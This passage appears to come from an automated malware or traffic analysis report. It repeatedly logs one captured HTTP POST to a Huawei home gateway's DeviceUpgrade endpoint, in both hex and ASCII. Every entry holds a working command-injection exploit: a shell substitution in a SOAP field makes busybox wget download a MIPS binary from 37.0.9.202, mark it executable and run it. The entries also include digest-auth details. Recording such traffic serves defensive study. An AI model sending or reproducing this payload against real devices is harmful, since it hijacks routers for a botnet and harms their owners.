xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
